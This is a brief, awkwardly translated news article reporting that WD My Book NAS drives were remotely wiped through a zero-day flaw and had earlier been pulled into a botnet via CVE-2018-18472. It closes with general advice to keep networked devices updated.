Zero-day crash allowed WD My Book NAS to be emptied
When we discussed the serious issue that put WD My Book users’ data at stake, it was unknown at the time why. Now we can confirm what we suspected: a vulnerability. Specifically, it is a zero-day failure or day zero that has been exploited.
Many users reported that on June 24 a script called factoryRestore.sh on your devices, you deleted the files from the device. This basically what he did was leave the equipment as it comes from the factory, with what that entails.
It must be remembered that this device has not received updates since 2015. Obviously, an uncorrected security flaw that can be used by hackers is a major problem that can lead to what we have seen.
Now they indicate that the attackers relied on a vulnerability registered as CVE-2018-18472, but they used a different one from zero day to get to reset the devices to factory settings and erase all stored content.
The latest device firmware, affected
This is a zero-day vulnerability that affected the latest firmware on the device. This flaw allowed an attacker, remotely, to perform a device reset and put it as it came from the factory on all those computers that were connected to the Internet.
Computer security researchers have also indicated that there may have been ongoing attacks for a long time. According to Abdine, attackers have long been exploiting the vulnerability CVE-2018-18472, which is from 2018. This allowed WD My Book devices to be added to a botnet. We already know that it is very important to prevent a computer from entering a botnet.
This vulnerability would be the gateway to run a command on the device which would download a script from a remote site and run it. When they were included in that botnet, attackers could use them remotely, carry out DDoS attacks, affect other computers or even steal stored files.
Once again we see the importance of having all our equipment correctly updated and that they do not have vulnerabilities. It is something that especially must be taken into account in IoT devices. We have more and more computers connected to the network and can be exposed if a vulnerability arises and can be exploited. There are many varieties of viruses, many problems in the form of malware that can harm us in one way or another.
From RedesZone we recommend keeping all computers connected to the network protected. We have seen many cases in which they can be attacked if there is a vulnerability or there is a problem related to the firmware (as in this case) or some installed program.